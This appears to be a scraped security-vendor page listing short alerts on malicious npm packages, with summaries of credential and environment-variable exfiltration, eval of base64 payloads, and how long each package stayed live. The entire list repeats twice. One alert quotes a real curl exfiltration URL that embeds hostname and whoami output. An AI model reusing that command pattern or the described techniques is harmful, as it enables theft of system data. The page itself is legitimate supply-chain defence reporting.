Secure your dependencies. Ship with confidence.

This script is making a potentially malicious request to a remote server using curl. The URL being constructed using the /etc/passwd file is suspicious and could be used for unauthorized access or data exfiltration.

Live on npm for 21 days, 3 hours and 18 minutes before removal. Socket users were protected even while the package was live.

This script appears to be executing potentially harmful commands by first pinging a suspicious domain and then executing decoded base64 content. This behavior is highly indicative of malicious intent.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

Malicious code in @zitterorg/laudantium-rerum (npm) Source: ghsa-malware (e45ff91dd83cc149d7abc8c6fb2c74e3509aa341e23c72cfac0a34868a4e2637) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The code is designed to collect sensitive system information and send it to an external server without user consent. The use of obfuscation techniques to hide this behavior indicates malicious intent.

Live on npm for 5 minutes before removal. Socket users were protected even while the package was live.

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

The code imports and calls functions from various modules without providing any context or documentation. The unusual naming conventions and lack of clear purpose suggest potential obfuscation or at least poor coding practices. However, without inspecting the content of the imported modules, it is difficult to definitively identify malicious behavior. The potential risk lies in the functionality of the 'functame' functions within these modules.

Live on npm for 56 days, 17 hours and 55 minutes before removal. Socket users were protected even while the package was live.

Malicious code in hldqgyckmuwxjefs (npm) Source: ghsa-malware (c36bd592f3ed72aefd6e362450c65f36a30e0add033ca8d4843a6b5d7c485ed6) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The script is designed to send sensitive system information to an external server, which is a clear indication of malicious behavior.

Live on npm for 12 minutes before removal. Socket users were protected even while the package was live.

The script is likely to be malicious as it's designed to collect and transmit potentially sensitive environment variables from the host machine. It uses obfuscation techniques to hide the destination of the data, making it harder to detect. Users should avoid using this script.

This script is using the 'curl' command to download a file from an external URL: 'http://curetosec.online/micro-username/%computername%`hostname`/%username%-`whoami`/p-wf-extract-text-in-image' This behavior is considered highly suspicious and could potentially be used to download and execute malicious code on the system.

Live on npm for 5 minutes before removal. Socket users were protected even while the package was live.

Malicious code in @zitterorg/laudantium-rerum (npm) Source: ghsa-malware (e45ff91dd83cc149d7abc8c6fb2c74e3509aa341e23c72cfac0a34868a4e2637) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

This package was removed from the npm registry for security reasons.

This code poses a serious security risk and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

The code is performing actions consistent with data exfiltration, such as collecting environment variables and sending them to an external server. The use of obfuscation and DNS for data transmission further indicates malicious intent.

Live on npm for 7 minutes before removal. Socket users were protected even while the package was live.

The script collects sensitive information from the system and sends it to an external server, which poses a significant security risk and indicates malicious behavior.

The script is designed to collect sensitive information about the user and send it to an external server, which is malicious behavior.

This script downloads a file from a remote server and sends user, path, and hostname information to the server. This behavior is considered suspicious and potentially malicious.

Live on npm for 27 days, 10 hours and 45 minutes before removal. Socket users were protected even while the package was live.

Malicious code in @zitterorg/laudantium-rerum (npm) Source: ghsa-malware (e45ff91dd83cc149d7abc8c6fb2c74e3509aa341e23c72cfac0a34868a4e2637) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious code in test494 (npm) Source: ghsa-malware (b4eee97c9c0e65b38d0550ad3c3c448e647fc469837a13ab37682c6cfd2a5c34) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

This code exhibits multiple signs of potential malicious behavior, including obfuscation, use of dangerous functions like execSync, and patterns suggesting the possibility of remote command execution and data manipulation. Caution is advised in using this code, and further investigation into the specific functions and intended behavior is recommended.

Live on npm for 2 days, 7 hours and 40 minutes before removal. Socket users were protected even while the package was live.

This package was removed from the npm registry for security reasons.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

The code takes a base64 encoded string, decodes it, and evaluates it using the 'eval' function. This introduces a significant security risk as it allows arbitrary code execution. The code should be considered dangerous and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

The script reads sensitive user data (bash history) and sends it to a remote server, which is a clear privacy violation and potential data theft. The remote server URL is hardcoded, pointing towards a specific and possibly malicious intent. The error in module import could potentially confuse or obscure the script's intention.

Live on npm for 2 hours and 8 minutes before removal. Socket users were protected even while the package was live.

The code imports several modules with unusual names and calls a `functame` method from each without clear documentation or comments explaining their purpose. This is suspicious and could potentially indicate obfuscation or malicious behavior. However, there is no concrete evidence of malicious actions such as data theft or system damage.

Live on npm for 56 days, 17 hours and 9 minutes before removal. Socket users were protected even while the package was live.

The code exhibits several concerning behaviors, including the use of hardcoded credentials, subprocess execution with potential for command injection, and interactions with external websites. These activities pose a significant security risk and should be further investigated.

Live on npm for 33 minutes before removal. Socket users were protected even while the package was live.

This script is making a potentially malicious request to a remote server using curl. The URL being constructed using the /etc/passwd file is suspicious and could be used for unauthorized access or data exfiltration.

Live on npm for 21 days, 3 hours and 18 minutes before removal. Socket users were protected even while the package was live.

This script appears to be executing potentially harmful commands by first pinging a suspicious domain and then executing decoded base64 content. This behavior is highly indicative of malicious intent.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

Malicious code in @zitterorg/laudantium-rerum (npm) Source: ghsa-malware (e45ff91dd83cc149d7abc8c6fb2c74e3509aa341e23c72cfac0a34868a4e2637) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The code is designed to collect sensitive system information and send it to an external server without user consent. The use of obfuscation techniques to hide this behavior indicates malicious intent.

Live on npm for 5 minutes before removal. Socket users were protected even while the package was live.

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

The code imports and calls functions from various modules without providing any context or documentation. The unusual naming conventions and lack of clear purpose suggest potential obfuscation or at least poor coding practices. However, without inspecting the content of the imported modules, it is difficult to definitively identify malicious behavior. The potential risk lies in the functionality of the 'functame' functions within these modules.

Live on npm for 56 days, 17 hours and 55 minutes before removal. Socket users were protected even while the package was live.

Malicious code in hldqgyckmuwxjefs (npm) Source: ghsa-malware (c36bd592f3ed72aefd6e362450c65f36a30e0add033ca8d4843a6b5d7c485ed6) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

The script is designed to send sensitive system information to an external server, which is a clear indication of malicious behavior.

Live on npm for 12 minutes before removal. Socket users were protected even while the package was live.

The script is likely to be malicious as it's designed to collect and transmit potentially sensitive environment variables from the host machine. It uses obfuscation techniques to hide the destination of the data, making it harder to detect. Users should avoid using this script.

This script is using the 'curl' command to download a file from an external URL: 'http://curetosec.online/micro-username/%computername%`hostname`/%username%-`whoami`/p-wf-extract-text-in-image' This behavior is considered highly suspicious and could potentially be used to download and execute malicious code on the system.

Live on npm for 5 minutes before removal. Socket users were protected even while the package was live.

Malicious code in @zitterorg/laudantium-rerum (npm) Source: ghsa-malware (e45ff91dd83cc149d7abc8c6fb2c74e3509aa341e23c72cfac0a34868a4e2637) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

This package was removed from the npm registry for security reasons.

This code poses a serious security risk and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

The code is performing actions consistent with data exfiltration, such as collecting environment variables and sending them to an external server. The use of obfuscation and DNS for data transmission further indicates malicious intent.

Live on npm for 7 minutes before removal. Socket users were protected even while the package was live.

The script collects sensitive information from the system and sends it to an external server, which poses a significant security risk and indicates malicious behavior.

The script is designed to collect sensitive information about the user and send it to an external server, which is malicious behavior.

This script downloads a file from a remote server and sends user, path, and hostname information to the server. This behavior is considered suspicious and potentially malicious.

Live on npm for 27 days, 10 hours and 45 minutes before removal. Socket users were protected even while the package was live.

Malicious code in @zitterorg/laudantium-rerum (npm) Source: ghsa-malware (e45ff91dd83cc149d7abc8c6fb2c74e3509aa341e23c72cfac0a34868a4e2637) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious code in test494 (npm) Source: ghsa-malware (b4eee97c9c0e65b38d0550ad3c3c448e647fc469837a13ab37682c6cfd2a5c34) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

This code exhibits multiple signs of potential malicious behavior, including obfuscation, use of dangerous functions like execSync, and patterns suggesting the possibility of remote command execution and data manipulation. Caution is advised in using this code, and further investigation into the specific functions and intended behavior is recommended.

Live on npm for 2 days, 7 hours and 40 minutes before removal. Socket users were protected even while the package was live.

This package was removed from the npm registry for security reasons.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

The code takes a base64 encoded string, decodes it, and evaluates it using the 'eval' function. This introduces a significant security risk as it allows arbitrary code execution. The code should be considered dangerous and should not be used.

Live on npm for 9 minutes before removal. Socket users were protected even while the package was live.

The script reads sensitive user data (bash history) and sends it to a remote server, which is a clear privacy violation and potential data theft. The remote server URL is hardcoded, pointing towards a specific and possibly malicious intent. The error in module import could potentially confuse or obscure the script's intention.

Live on npm for 2 hours and 8 minutes before removal. Socket users were protected even while the package was live.

The code imports several modules with unusual names and calls a `functame` method from each without clear documentation or comments explaining their purpose. This is suspicious and could potentially indicate obfuscation or malicious behavior. However, there is no concrete evidence of malicious actions such as data theft or system damage.

Live on npm for 56 days, 17 hours and 9 minutes before removal. Socket users were protected even while the package was live.

The code exhibits several concerning behaviors, including the use of hardcoded credentials, subprocess execution with potential for command injection, and interactions with external websites. These activities pose a significant security risk and should be further investigated.

Live on npm for 33 minutes before removal. Socket users were protected even while the package was live.